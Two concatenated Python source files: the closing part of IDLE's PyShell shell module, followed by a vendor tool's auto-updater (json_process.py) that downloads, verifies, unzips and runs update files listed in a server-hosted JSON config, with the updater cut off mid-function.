global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
firewallmessage = """
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
"""
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s\nIDLE %s %s\n" %
(sys.version, sys.platform, self.COPYRIGHT,
self.firewallmessage, idlever.IDLE_VERSION, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return True
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
json_process.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import copy
import hashlib
import json
import os
import subprocess
import sys
import urllib.request
import zipfile
import shutil
import threading
import datetime
from dateutil.parser import parse
from threading import Timer
import wx
from fileIO import ifExist
import time
import platform
import ctypes
import PySimpleGUI as sg
from urllib import request
# ---------------------------------------
# Author : KingKa Wu
# Date : 2020-10-16
# Function : update json file process
# ---------------------------------------
check_update_time = 7200.0 # 定义自动检查更新时间间隔
url_get_timeout = 10.0 # 定义从服务器拉取文件超时时间
main_program_flag = 0 # 定义是否主程序重启flag
version_current_get = "1.4" #定义当前工具版本
update_messageCount = 0 #定义弹窗提示次数
###########################################################################################
# Add by Kingka 2020.12.2 for update progress bar
global_filename = "" # 定义当前升级文件名字
global_percent = 0 # 定义升级进度的百分比
bg = '#F0F0F0'
sg.SetOptions(background_color=bg, )
progressbar = [
[sg.ProgressBar(100, orientation='h', size=(40, 20), key='progressbar', bar_color=('#008B00', '#DCDCDC'))]
]
outputwin = [
[sg.Output(size=(40, 10))]
]
layout = [
[sg.Frame('当前文件更新进度', title_color="#000000", layout=progressbar, background_color=bg)],
[sg.Frame('', title_color="#000000", layout=outputwin, background_color=bg)],
]
window = sg.Window('软件更新进度', layout, no_titlebar=True, keep_on_top=False, element_justification='center')
progress_bar = window['progressbar']
'''
# 更新提示窗口
def updateWindow():
global window
while True:
event, values = window.read(timeout=10)
while 0 < global_percent < 100:
print("\r", '>>>> Downloading [%s] %.1f%%\r' % (global_filename, global_percent))
progress_bar.UpdateBar(global_percent)
time.sleep(0.1)
# window.close()
'''
update_lock = 0
# 更新提示窗口
def updateWindow():
global window, global_percent, update_lock
while True:
event, values = window.read(timeout=10)
while 0 < global_percent <= 100:
if update_lock == 0 and global_percent != 100:
print("\r")
print("\r", '[%s] 资源包更新中,请勿操作... ' % (global_filename))
update_lock = update_lock + 1
elif update_lock == 0 and global_percent == 100:
global_percent = 0
if update_lock != 0 and global_percent == 100:
global_percent = 0
update_lock = 0
print("\r", '[%s] 资源包更新完成。' % (global_filename))
time.sleep(3)
progress_bar.UpdateBar(global_percent)
time.sleep(0.1)
# window.close()
# 定义网络请求包回调函数
def fun(blocknum, blocksize, totalsize):
global global_percent
global_percent = blocknum * blocksize / totalsize
if global_percent > 1.0:
global_percent = 1.0
global_percent = global_percent * 100
# 检查网络连通性
def check_net(fileurl):
try:
request.urlopen(url=fileurl, timeout=url_get_timeout)
except:
return False
return True
######################################################################################################
def cut(obj, sec):
"""
切割函数
"""
return [obj[i:i + sec] for i in range(0, len(obj), sec)]
def getLocalSpace(folder):
"""
获取磁盘剩余空间
:param folder: 磁盘路径 例如 E:\\qpythontools
:return: 剩余空间 单位 MB
"""
folderTemp = folder
if not os.path.exists(folderTemp):
folderTemp = os.getcwd()
if platform.system() == 'Windows':
free_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(folderTemp), None, None, ctypes.pointer(free_bytes))
return free_bytes.value / 1024 / 1024 # / 1024 MB
else:
st = os.statvfs(folderTemp)
return st.f_bavail * st.f_frsize / 1024 / 1024
def get_file_md5(file_name):
"""
Calculate the MD5 for the file
:param file_name:
:return:
"""
m = hashlib.md5() # 创建md5对象
with open(file_name, 'rb') as fobj:
while True:
data = fobj.read(4096)
if not data:
break
m.update(data) # 更新md5对象
return m.hexdigest() # 返回md5对象
def get_str_md5(content):
"""
Calculate the MD5 for the str file
:param content:
:return:
"""
m = hashlib.md5(content) # 创建md5对象
return m.hexdigest()
def restart_program():
"""
Restart main program
:return:
"""
print("restart main exe...")
python = sys.executable
os.execl(python, python, *sys.argv)
# 删除目录
def rmDir(Path):
if os.path.exists(Path):
try:
shutil.rmtree(Path)
while True:
time.sleep(0.1)
if not ifExist(Path):
break
return True
except:
info = sys.exc_info()
print("remove Dir error.")
print(info[0], info[1])
return False
else:
return True
# 删除文件
def rmFile(File):
if os.path.exists(File):
try:
os.remove(File)
return True
except:
info = sys.exc_info()
print("remove file error.")
print(info[0], info[1])
return False
else:
return True
def delete_file(filepath):
"""
删除文件或者文件夹
"""
print("delete_file begin...")
if filepath[0] == '{': # 代表此路径为相对路径
str = filepath.replace('{}', '')
path = os.getcwd() + str
if not os.path.exists(path):
print("%s 文件/文件夹路径不存在!" % (path))
return True
else:
if os.path.isdir(path): # 是否是文件夹目录
return rmDir(path)
elif os.path.isfile(path): # 是否是文件路径
return rmFile(path)
else: # 代表此路径为绝对路径
if not os.path.exists(filepath):
print("%s 文件/文件夹路径不存在!" % (filepath))
return True
else:
if os.path.isdir(filepath): # 是否是文件夹目录
return rmDir(filepath)
elif os.path.isfile(filepath): # 是否是文件路径
return rmFile(filepath)
def override_file(fileurl, filepath, filemd5):
print("override_file begin...")
if getLocalSpace(os.getcwd()) < 500: # 磁盘空间小于500MB
wx.MessageDialog(None, "磁盘空间不足!", u"提醒", wx.OK).ShowModal()
return False
else:
if filepath[0] == '{': # 代表此路径为相对路径
str = filepath.replace('{}', '')
path = os.getcwd() + str
delete_file(path)
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, path, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(path) == filemd5:
print("%s md5下载文件校验通过!" % (path))
return True
else:
print("%s md5下载文件校验失败!" % (path))
return False
else: # 代表此路径为绝对路径
delete_file(filepath)
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, filepath, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(filepath) == filemd5:
print("%s md5下载文件校验通过!" % (filepath))
return True
else:
print("%s md5下载文件校验失败!" % (filepath))
return False
def download_file(fileurl, filepath, filemd5):
print("download_file begin...")
if getLocalSpace(os.getcwd()) < 500: # 空间小于500MB
wx.MessageDialog(None, "磁盘空间不足!", u"提醒", wx.OK).ShowModal()
return False
else:
if filepath[0] == '{': # 代表此路径为相对路径
str = filepath.replace('{}', '')
path = os.getcwd() + str
pathTemp = path
(path, tempfilename) = os.path.split(path)
if os.path.exists(path):
print("%s 下载路径存在!" % (path))
if os.access(path, os.W_OK):
print("%s 下载路径可以访问!" % (path))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, pathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(pathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (pathTemp))
return True
else:
print("%s md5下载文件校验失败!" % (pathTemp))
return False
except:
return False
else:
print("% 下载路径无法访问" % (path))
return False
else:
print("%s 下载路径不存在则创建" % (path))
os.makedirs(path)
if os.path.exists(path):
if os.access(path, os.W_OK):
print("%s 下载路径可以访问" % (path))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, pathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(pathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (pathTemp))
return True
else:
print("%s md5下载文件校验失败!" % (pathTemp))
return False
except:
print("%s 没有权限访问!" % (path))
return False
else:
print("%s 无法访问" % (path))
return False
else:
print("%s 目录创建失败" % (path))
return False
else: # 代表此路径为绝对路径
filepathTemp = filepath
(filepath, tempfilename) = os.path.split(filepath)
if os.path.exists(filepath):
print("%s 下载路径存在!" % (filepath))
if os.access(filepath, os.W_OK):
print("%s 下载路径可以访问" % (filepath))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, filepathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(filepathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (filepathTemp))
return True
else:
print("%s md5下载文件校验失败!" % (filepathTemp))
return False
except:
print("%s 没有权限访问!" % (filepath))
return False
else:
print("%s 下载路径无法访问" % (filepath))
return False
else:
print("%s 下载路径不存在则创建!" % (filepath))
os.makedirs(filepath)
if os.path.exists(filepath):
if os.access(filepath, os.W_OK):
print("%s 下载路径可以访问!" % (filepath))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, filepathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(filepathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (filepathTemp))
return True
else:
print("%s md5下载文件校验失败!" % (filepathTemp))
return False
except:
print("%s 没有权限访问!" % (filepath))
return False
else:
print("%s 下载路径无法访问!" % (filepath))
return False
else:
print("%s 下载路径目录创建失败!" % (filepath))
return False
def unzip_file(zip_src, dst_dir):
"""
zip_src: zip文件的全路径
dst_dir: 要解压到的目录文件夹
"""
r = zipfile.is_zipfile(zip_src)
if r:
fz = zipfile.ZipFile(zip_src, 'r')
for file in fz.namelist():
fz.extract(file, dst_dir)
else:
print('This is not zip')
def decompress_file(fileurl, filepath, filemd5):
print("decompress_file begin...")
if getLocalSpace(os.getcwd()) < 500: # 磁盘空间小于500M
wx.MessageDialog(None, "磁盘空间不足!", u"提醒", wx.OK).ShowModal()
return False
else:
if filepath[0] == '{': # 代表此路径为相对路径
str = filepath.replace('{}', '')
path = os.getcwd() + str
pathTemp = path
(path, tempfilename) = os.path.split(path)
if os.path.exists(path):
print("%s 解压路径存在!" % (path))
if os.access(path, os.W_OK):
print("%s 解压路径可以访问!" % (path))
# md5校验判断
if get_file_md5(pathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (pathTemp))
decompresspath, tmpfilename = os.path.split(pathTemp)
unzip_file(pathTemp, decompresspath)
return True
else:
print("%s md5下载文件校验失败!" % (pathTemp))
return False
else:
print("%s 解压路径无法访问" % (path))
return False
else:
print("%s 解压路径不存在则创建" % (path))
os.makedirs(path)
if os.path.exists(path):
if os.access(path, os.W_OK):
print("%s 解压路径可以访问" % (path))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, pathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(pathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (pathTemp))
decompresspath, tmpfilename = os.path.split(pathTemp)
unzip_file(pathTemp, decompresspath)
return True
else:
print("%s md5下载文件校验失败!" % (pathTemp))
return False
except:
print("%s 没有权限访问!" % (path))
return False
else:
print("%s 无法访问" % (path))
return False
else:
print("%s 目录创建失败" % (path))
return False
else: # 代表此路径为绝对路径
filepathTemp = filepath
(filepath, tempfilename) = os.path.split(filepath)
if os.path.exists(filepath):
print("%s 解压路径存在!" % (filepath))
if os.access(filepath, os.W_OK):
print("%s 解压路径可以访问" % (filepath))
# md5校验判断
if get_file_md5(filepathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (filepathTemp))
decompresspath, tmpfilename = os.path.split(filepathTemp)
unzip_file(filepathTemp, decompresspath)
return True
else:
print("%s md5下载文件校验失败!" % (filepathTemp))
return False
else:
print("%s 解压路径无法访问" % (filepath))
return False
else:
print("%s 解压路径不存在则创建!" % (filepath))
os.makedirs(filepath)
if os.path.exists(filepath):
if os.access(filepath, os.W_OK):
print("%s 解压路径可以访问!" % (filepath))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, filepathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(filepathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (filepathTemp))
decompresspath, tmpfilename = os.path.split(filepathTemp)
unzip_file(filepathTemp, decompresspath)
return True
else:
print("%s md5下载文件校验失败!" % (filepathTemp))
return False
except:
print("%s 没有权限访问!" % (filepath))
return False
else:
print("%s 解压路径无法访问!" % (filepath))
return False
else:
print("%s 解压路径目录创建失败!" % (filepath))
return False
def exec_file(filepath):
print("exec_file")
if filepath[0] == '{': # 代表此路径为相对路径
str = filepath.replace('{}', '')
path = os.getcwd() + str
if os.path.exists(path):
if os.access(path, os.X_OK):
os.system('python %s' % path)
return True
else:
print("%s 文件执行无法访问" % (path))
return False
else:
print("%s 文件执行失败!" % (path))
wx.MessageDialog(None, "文件不存在,执行失败!", u"提醒", wx.OK).ShowModal()
return False
else: # 代表此路径为绝对路径
if os.path.exists(filepath):
if os.access(filepath, os.X_OK):
os.system('python %s' % filepath)
return True
else:
print("%s 文件执行无法访问" % (filepath))
return False
else:
wx.MessageDialog(None, "文件不存在,执行失败!", u"提醒", wx.OK).ShowModal()
return False
def file_deal(filename, fileurl, filepath, filemd5, fileopera):
"""
File opera in different mode
:return:
"""
global global_filename
global_filename = filename
if "main_program.zip" in filename:
global main_program_flag
main_program_flag = 1
if fileopera == "override": # 覆盖该文件
return override_file(fileurl, filepath, filemd5)
if fileopera == "download":
return download_file(fileurl, filepath, filemd5)
if fileopera == "delete":
return delete_file(filepath)
if fileopera == "decompress":
return decompress_file(fileurl, filepath, filemd5)
if fileopera == "exec":
return exec_file(filepath)
def cloud_conf_get(filename):
"""
Get cloud conf json file
:return:
"""
file_url_get_cloud_json = 'http://qpy.quectel.com/qpytools/' + filename # 定义服务器升级URL
# filename = 'cloud_conf.json'
filepath = os.getcwd() + '\\' + filename
if os.path.exists(filepath):
print("删除旧配置文件...")
os.remove(filepath)
else:
print('no such file:%s' % filepath)
try:
if check_net(file_url_get_cloud_json):
urllib.request.urlretrieve(file_url_get_cloud_json, filepath, fun)
return True
else:
print("服务器连接异常!")
# wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
return False
except Exception as e:
print("出现异常:" + str(e))
# wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
return False
def cloud_version_newst_get():
cloud_conf_get('cloud_conf.json')
list_cloud_file_ver_dictionary = {}
dict_cloud_str = json.load(open(os.getcwd() + '\\' + 'cloud_conf.json', encoding="utf8"))
count_local = dict_cloud_str["totalcount"]
for i in range(count_local):
list_cloud_file_ver_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(
dict_cloud_str["filelist"][i]["ver"]) # 获取本地文件及其对应版本号
versionCloudGet = list_cloud_file_ver_dictionary['main_program.zip'][0]
return versionCloudGet
def json_process_handle(id):
"""
Json file process main entrance
:return:
"""
cloud_conf_get('cloud_conf.json')
try:
json.load(open(os.getcwd() + '\\' + 'cloud_conf.json', encoding="utf8"))
json.load(open(os.getcwd() + '\\' + 'local_conf.json', encoding="utf8"))
json.load(open(os.getcwd() + '\\' + 'update_message.json', encoding="utf8"))
except Exception as e:
print("json load error!")
print(e)
result = wx.MessageDialog(None, "本地配置文件加载错误,选择 [是] 重新从服务器拉取.", u"提示", wx.YES_NO).ShowModal()
if result == wx.ID_NO:
return
elif result == wx.ID_YES:
r = cloud_conf_get('local_conf.json')
if r is False:
return
dict_cloud_str = json.load(open(os.getcwd() + '\\' + 'cloud_conf.json', encoding="utf8"))
dict_local_str = json.load(open(os.getcwd() + '\\' + 'local_conf.json', encoding="utf8"))
dict_update_str = json.load(open(os.getcwd() + '\\' + 'update_message.json', encoding="utf8"))
count_cloud = dict_cloud_str["totalcount"]
count_local = dict_local_str["totalcount"]
list_local_file = [] # 定义本地配置文件中所有文件列表
list_cloud_file = [] # 定义云端配置文件中所有文件列表
list_cloud_update_mode_unexit_file_dictionary = {} # 定义云端配置文件在本地不存在时升级模式字典
list_cloud_restart_unexit_file_dictionary = {} # 定义云端配置文件本地不存在时重启应用程序字典
list_cloud_update_mode_file_dictionary = {} # 定义云端配置文件升级模式字典
list_cloud_restart_file_dictionary = {} # 定义云端配置文件重启应用程序字典
list_cloud_file_unexit_dictionary = {} # 定义云端升级文件在本地不存在的字典
list_cloud_file_dictionary = {} # 定义筛选后的需要升级云端配置文件字典 (云端总配置字典 )
list_local_unexit_file_dictionary = {} # 定义云端文件在本地配置文件不存时,本地配置文件字典
list_local_file_dictionary = {} # 定义本地配置文件字典,用于更新升级后的本地配置文件 (本地总配置字典)
list_local_file_ver_dictionary = {} # 定义本地配置文件版本号字典
restart_flag = 0 # 定义主程序是否重启操作标志
# exit_flag = 0 # 定义主程序是否退出标志
update_fail_flag = 0 # 定义本次升级是否成功标志
update_select_flag = 0 # 定义用户选择升级标志
global window # 定义全局提示窗口属性
# 本地文件配置属性
for i in range(count_local):
list_local_file.append(dict_local_str["filelist"][i]["file"]) # 获取本地文件列表
list_local_file_ver_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(
